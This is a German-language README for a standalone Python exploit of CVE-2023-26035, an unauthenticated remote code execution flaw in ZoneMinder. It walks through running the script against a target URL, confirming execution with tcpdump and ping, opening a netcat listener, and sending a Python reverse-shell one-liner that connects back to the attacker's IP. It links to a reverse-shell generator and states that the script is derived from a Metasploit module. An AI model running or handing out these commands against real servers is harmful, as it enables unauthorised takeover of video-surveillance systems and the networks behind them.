
Exploit für CVE-2023-26035, der ZoneMinder < 1.36.33 und < 1.37.33 betrifft
Es gibt eine nicht authentifizierte Remote Code Execution (RCE), die ZoneMinder Snapshots betrifft.
Dies ist ein Exploit für CVE-2023-26035.
ZoneMinder < 1.36.33 und
ZoneMinder < 1.37.33.

python3 zoneminder.py http://target
python3 zoneminder.py http://target command
pingFühren Sie tcpdump auf dem mit dem Ziel verbundenen Interface (hier tun0) aus und filtern Sie nach ICMP-Paketen:
sudo tcpdump -i tun0 icmp
Führen Sie dann einen Ping auf Ihre IP aus. Achten Sie darauf, Anführungszeichen " zu verwenden, da der Befehl sonst nicht korrekt interpretiert wird.
python3 zoneminder.py http://target "ping -C 4 your_ip"
Erstellen Sie den Listener mit netcat:
nc -lvnp 1337
Verwenden Sie einen Reverse-Shell-Oneliner:
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"
Mehr unter https://revshells.com.
Das Exploit nutzt requests und BeautifulSoup.
Installieren Sie es mit:
python3 -m pip install requests beautifulsoup4
Ich wollte nur ein eigenständiges Exploit, das kein Metasploit benötigt.
Das Skript ist abgeleitet von https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr